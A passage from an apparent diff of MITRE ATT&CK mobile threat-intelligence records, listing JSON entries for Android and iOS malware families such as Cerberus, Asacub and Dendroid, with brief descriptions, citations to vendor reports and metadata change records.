"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AhRat" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Edward Stevens, BT Security" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-22 21:22:24.938000+00:00\", \"old_value\": \"2025-01-24 17:12:44.782000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Edward Stevens, BT Security\", \"old_value\": \"Edward Stevens\"}}, \"iterable_item_removed\": {\"root['x_mitre_contributors'][1]\": \"BT Security\"}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--08784a9d-09e9-4dce-a839-9612398214e8", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2018-10-17 00:14:20.652000+00:00", + "modified": "2025-04-25 14:40:14.772000+00:00", + "name": "Allwinner", + "description": "[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0319", + "external_id": "S0319" + }, + { + "source_name": "Allwinner", + "description": "(Citation: HackerNews-Allwinner)" + }, + { + "source_name": "HackerNews-Allwinner", + "description": "Mohit Kumar. (2016, May 11). Kernel Backdoor found in Gadgets Powered by Popular Chinese ARM Maker. Retrieved September 18, 2018.", + "url": "https://thehackernews.com/2016/05/android-kernal-exploit.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:14.772000+00:00\", \"old_value\": \"2025-04-16 21:22:03.823000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--f7e7b736-2cff-4c2a-9232-352cd383463a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-29 19:19:08.848000+00:00", + "modified": "2025-04-25 14:40:46.381000+00:00", + "name": "Android/AdDisplay.Ashas", + "description": "[Android/AdDisplay.Ashas](https://attack.mitre.org/software/S0525) is a variant of adware that has been distributed through multiple apps in the Google Play Store. (Citation: WeLiveSecurity AdDisplayAshas)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0525", + "external_id": "S0525" + }, + { + "source_name": "WeLiveSecurity AdDisplayAshas", + "description": "L. Stefanko. (2019, October 24). Tracking down the developer of Android adware affecting millions of users. Retrieved October 29, 2020.", + "url": "https://www.welivesecurity.com/2019/10/24/tracking-down-developer-android-adware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Android/AdDisplay.Ashas" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:46.381000+00:00\", \"old_value\": \"2025-04-16 21:22:16.304000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--d05f7357-4cbe-47ea-bf83-b8604226d533", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:45.482000+00:00", + "modified": "2025-04-25 14:40:40.920000+00:00", + "name": "Android/Chuli.A", + "description": "[Android/Chuli.A](https://attack.mitre.org/software/S0304) is Android malware that was delivered to activist groups via a spearphishing email with an attachment. (Citation: Kaspersky-WUC)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0304", + "external_id": "S0304" + }, + { + "source_name": "Android/Chuli.A", + "description": "(Citation: Kaspersky-WUC)" + }, + { + "source_name": "Kaspersky-WUC", + "description": "Costin Raiu, Denis Maslennikov, Kurt Baumgartner. (2013, March 26). Android Trojan Found in Targeted Attack. Retrieved December 23, 2016.", + "url": "https://securelist.com/android-trojan-found-in-targeted-attack-58/35552/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Android/Chuli.A" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:40.920000+00:00\", \"old_value\": \"2025-04-16 21:22:14.103000+00:00\"}}}", + "previous_version": "1.2" + }, + { + "type": "malware", + "id": "malware--9b86f8c3-33ab-44cf-a66d-c0fd6070e2ce", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-10-29 18:41:49.272000+00:00", + "modified": "2025-04-25 14:40:32.960000+00:00", + "name": "AndroidOS/MalLocker.B", + "description": "[AndroidOS/MalLocker.B](https://attack.mitre.org/software/S0524) is a variant of a ransomware family targeting Android devices. It prevents the user from interacting with the UI by displaying a screen containing a ransom note over all other windows. (Citation: Microsoft MalLockerB)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0524", + "external_id": "S0524" + }, + { + "source_name": "Microsoft MalLockerB", + "description": "D. Venkatesan. (2020, October 8). Sophisticated new Android malware marks the latest evolution of mobile ransomware . Retrieved October 29, 2020.", + "url": "https://www.microsoft.com/security/blog/2020/10/08/sophisticated-new-android-malware-marks-the-latest-evolution-of-mobile-ransomware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "AndroidOS/MalLocker.B" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:32.960000+00:00\", \"old_value\": \"2025-04-16 21:22:11.027000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a76b837b-93cc-417d-bf28-c47a6a284fa4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-14 15:02:35.007000+00:00", + "modified": "2025-04-25 14:40:35.670000+00:00", + "name": "Asacub", + "description": "[Asacub](https://attack.mitre.org/software/S0540) is a banking trojan that attempts to steal money from victims\u2019 bank accounts. It attempts to do this by initiating a wire transfer via SMS message from compromised devices.(Citation: Securelist Asacub)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0540", + "external_id": "S0540" + }, + { + "source_name": "Trojan-SMS.AndroidOS.Smaps", + "description": "(Citation: Securelist Asacub)" + }, + { + "source_name": "Securelist Asacub", + "description": "T. Shishkova. (2018, August 28). The rise of mobile banker Asacub. Retrieved December 14, 2020.", + "url": "https://securelist.com/the-rise-of-mobile-banker-asacub/87591/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Asacub", + "Trojan-SMS.AndroidOS.Smaps" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:35.670000+00:00\", \"old_value\": \"2025-04-16 21:22:12.041000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--a0d774e4-bafc-4292-8651-3ec899391341", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-31 18:25:04.779000+00:00", + "modified": "2025-04-25 14:40:33.676000+00:00", + "name": "CHEMISTGAMES", + "description": "[CHEMISTGAMES](https://attack.mitre.org/software/S0555) is a modular backdoor that has been deployed by [Sandworm Team](https://attack.mitre.org/groups/G0034).(Citation: CYBERWARCON CHEMISTGAMES)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0555", + "external_id": "S0555" + }, + { + "source_name": "CYBERWARCON CHEMISTGAMES", + "description": "B. Leonard, N. Mehta. (2019, November 21). The Secret Life of Sandworms. Retrieved December 31, 2020.", + "url": "https://www.youtube.com/watch?v=xoNSbm1aX_w" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CHEMISTGAMES" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:33.676000+00:00\", \"old_value\": \"2025-04-16 21:22:11.340000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--007ebf84-4e14-44c7-a5aa-151d5de85320", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-11-10 16:50:38.917000+00:00", + "modified": "2025-04-25 14:40:13.122000+00:00", + "name": "CarbonSteal", + "description": "[CarbonSteal](https://attack.mitre.org/software/S0529) is one of a family of four surveillanceware tools that share a common C2 infrastructure. [CarbonSteal](https://attack.mitre.org/software/S0529) primarily deals with audio surveillance. (Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0529", + "external_id": "S0529" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "CarbonSteal" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:13.122000+00:00\", \"old_value\": \"2025-04-16 21:22:03.013000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--037f44f0-0c07-4c7f-b40e-0325b5b228a9", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 15:32:24.569000+00:00", + "modified": "2025-04-25 14:40:13.502000+00:00", + "name": "Cerberus", + "description": "[Cerberus](https://attack.mitre.org/software/S0480) is a banking trojan whose usage can be rented on underground forums and marketplaces. Prior to being available to rent, the authors of [Cerberus](https://attack.mitre.org/software/S0480) claim was used in private operations for two years.(Citation: Threat Fabric Cerberus)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0480", + "external_id": "S0480" + }, + { + "source_name": "Threat Fabric Cerberus", + "description": "Threat Fabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved June 26, 2020.", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Cerberus" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Aviran Hazum, Check Point", + "Sergey Persikov, Check Point" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:13.502000+00:00\", \"old_value\": \"2025-04-16 21:22:03.157000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--d1c600f8-0fb6-4367-921b-85b71947d950", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:39.631000+00:00", + "modified": "2025-04-25 14:40:41.299000+00:00", + "name": "Charger", + "description": "[Charger](https://attack.mitre.org/software/S0323) is Android malware that steals steals contacts and SMS messages from the user's device. It can also lock the device and demand ransom payment if it receives admin permissions. (Citation: CheckPoint-Charger)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0323", + "external_id": "S0323" + }, + { + "source_name": "Charger", + "description": "(Citation: CheckPoint-Charger)" + }, + { + "source_name": "CheckPoint-Charger", + "description": "Oren Koriat and Andrey Polkovnichenko. (2017, January 24). Charger Malware Calls and Raises the Risk on Google Play. Retrieved January 24, 2017.", + "url": "http://blog.checkpoint.com/2017/01/24/charger-malware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Charger" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:41.299000+00:00\", \"old_value\": \"2025-04-16 21:22:14.258000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--c6a07c89-a24c-4c7e-9e3e-6153cc595e24", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-26 15:33:55.798000+00:00", + "modified": "2025-04-25 14:40:38.438000+00:00", + "name": "Circles", + "description": "[Circles](https://attack.mitre.org/software/S0602) reportedly takes advantage of Signaling System 7 (SS7) weaknesses, the protocol suite used to route phone calls, to both track the location of mobile devices and intercept voice calls and SMS messages. It can be connected to a telecommunications company\u2019s infrastructure or purchased as a cloud service. Circles has reportedly been linked to the NSO Group.(Citation: CitizenLab Circles)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0602", + "external_id": "S0602" + }, + { + "source_name": "CitizenLab Circles", + "description": "Bill Marczak, John Scott-Railton, Siddharth Prakash Rao, Siena Anstis, and Ron Deibert. (2020, December 1). Running in Circles Uncovering the Clients of Cyberespionage Firm Circles. Retrieved December 23, 2020.", + "url": "https://citizenlab.ca/2020/12/running-in-circles-uncovering-the-clients-of-cyberespionage-firm-circles/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Circles" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:38.438000+00:00\", \"old_value\": \"2025-04-16 21:22:13.137000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--89c3dbf6-f281-41b7-be1d-a0e641014853", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 15:12:10.817000+00:00", + "modified": "2025-04-25 14:40:31.516000+00:00", + "name": "Concipit1248", + "description": "[Concipit1248](https://attack.mitre.org/software/S0426) is iOS spyware that was discovered using the same name as the developer of the Android spyware [Corona Updates](https://attack.mitre.org/software/S0425). Further investigation revealed that the two pieces of software contained the same C2 URL and similar functionality.(Citation: TrendMicro Coronavirus Updates)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0426", + "external_id": "S0426" + }, + { + "source_name": "Corona Updates", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Concipit1248", + "Corona Updates" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "iOS" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:31.516000+00:00\", \"old_value\": \"2025-04-16 21:22:10.526000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--366c800f-97a8-48d5-b0a6-79d00198252a", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-04-24 15:06:32.870000+00:00", + "modified": "2025-04-25 14:40:23.129000+00:00", + "name": "Corona Updates", + "description": "[Corona Updates](https://attack.mitre.org/software/S0425) is Android spyware that took advantage of the Coronavirus pandemic. The campaign distributing this spyware is tracked as Project Spy. Multiple variants of this spyware have been discovered to have been hosted on the Google Play Store.(Citation: TrendMicro Coronavirus Updates)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0425", + "external_id": "S0425" + }, + { + "source_name": "Wabi Music", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "Concipit1248", + "description": "(Citation: TrendMicro Coronavirus Updates)" + }, + { + "source_name": "TrendMicro Coronavirus Updates", + "description": "T. Bao, J. Lu. (2020, April 14). Coronavirus Update App Leads to Project Spy Android and iOS Spyware. Retrieved April 24, 2020.", + "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/coronavirus-update-app-leads-to-project-spy-android-and-ios-spyware/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Corona Updates", + "Wabi Music", + "Concipit1248" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:23.129000+00:00\", \"old_value\": \"2025-04-16 21:22:07.148000+00:00\"}}}", + "previous_version": "1.1" + }, + { + "type": "malware", + "id": "malware--5a5dca4c-03c1-4b99-bfcf-c206e20aa663", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-06-26 15:12:39.648000+00:00", + "modified": "2025-04-25 14:40:27.329000+00:00", + "name": "DEFENSOR ID", + "description": "[DEFENSOR ID](https://attack.mitre.org/software/S0479) is a banking trojan capable of clearing a victim\u2019s bank account or cryptocurrency wallet and taking over email or social media accounts. [DEFENSOR ID](https://attack.mitre.org/software/S0479) performs the majority of its malicious functionality by abusing Android\u2019s accessibility service.(Citation: ESET DEFENSOR ID) ", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0479", + "external_id": "S0479" + }, + { + "source_name": "ESET DEFENSOR ID", + "description": "L. Stefanko. (2020, May 22). Insidious Android malware gives up all malicious features but one to gain stealth. Retrieved June 26, 2020.", + "url": "https://www.welivesecurity.com/2020/05/22/insidious-android-malware-gives-up-all-malicious-features-but-one-gain-stealth/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DEFENSOR ID" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Luk\u00e1\u0161 \u0160tefanko, ESET" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:27.329000+00:00\", \"old_value\": \"2025-04-16 21:22:08.935000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--317a2c10-d489-431e-b6b2-f0251fddc88e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.438000+00:00", + "modified": "2025-04-25 14:40:21.321000+00:00", + "name": "Dendroid", + "description": "[Dendroid](https://attack.mitre.org/software/S0301) is an Android remote access tool (RAT) primarily targeting Western countries. The RAT was available for purchase for $300 and came bundled with a utility to inject the RAT into legitimate applications.(Citation: Lookout-Dendroid)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0301", + "external_id": "S0301" + }, + { + "source_name": "Dendroid", + "description": "(Citation: Lookout-Dendroid)" + }, + { + "source_name": "Lookout-Dendroid", + "description": "Marc Rogers. (2014, March 6). Dendroid malware can take over your camera, record audio, and sneak into Google Play. Retrieved December 22, 2016.", + "url": "https://blog.lookout.com/blog/2014/03/06/dendroid/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "Dendroid" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "2.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:21.321000+00:00\", \"old_value\": \"2025-04-16 21:22:06.526000+00:00\"}}}", + "previous_version": "2.0" + }, + { + "type": "malware", + "id": "malware--3d6c4389-3489-40a3-beda-c56e650b6f68", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-12-24 21:50:02.027000+00:00", + "modified": "2025-04-25 14:40:24.588000+00:00", + "name": "DoubleAgent", + "description": "[DoubleAgent](https://attack.mitre.org/software/S0550) is a family of RAT malware dating back to 2013, known to target groups with contentious relationships with the Chinese government.(Citation: Lookout Uyghur Campaign)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0550", + "external_id": "S0550" + }, + { + "source_name": "Lookout Uyghur Campaign", + "description": "A. Kumar, K. Del Rosso, J. Albrecht, C. Hebeisen. (2020, June 1). Mobile APT Surveillance Campaigns Targeting Uyghurs - A collection of long-running Android tooling connected to a Chinese mAPT actor. Retrieved November 10, 2020.", + "url": "https://www.lookout.com/documents/threat-reports/us/lookout-uyghur-malware-tr-us.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_aliases": [ + "DoubleAgent" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:24.588000+00:00\", \"old_value\": \"2025-04-16 21:22:07.802000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--ff742eeb-1f90-4f5a-8b92-9d40fffd99ca", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:37.856000+00:00", + "modified": "2025-04-25 14:40:47.460000+00:00", + "name": "DressCode", + "description": "[DressCode](https://attack.mitre.org/software/S0300) is an Android malware family. (Citation: TrendMicro-DressCode)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0300", + "external_id": "S0300" + }, + { + "source_name": "DressCode", + "description": "(Citation: TrendMicro-DressCode)" + }, + { + "source_name": "TrendMicro-DressCode", + "description": "Echo Duan. (2016, September 29). DressCode and its Potential Impact for Enterprises. Retrieved December 22, 2016.", + "url": "http://blog.trendmicro.com/trendlabs-security-intelligence/dresscode-potential-impact-enterprises/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:40:47.460000+00:00\", \"old_value\": \"2025-04-16 21:22:16.646000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "malware", + "id": "malware--507fe748-5e4a-4b45-9e9f-8b1115f4e878", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-10-25 14:48:41.721000+00:00", + "modified": "2025-04-25 14:40:26.050000+00:00", + "name": "DualToy", + "description": "[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)", + "revoked": false, + "labels": [ + "malware" + ], + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0315", + "external_id": "S0315" + }, + { + "source_name": "DualToy", + "description": "(Citation: PaloAlto-DualToy)" + }, + { + "source_name": "PaloAlto-DualToy", + "description": "Claud Xiao. (2016, September 13). DualToy: 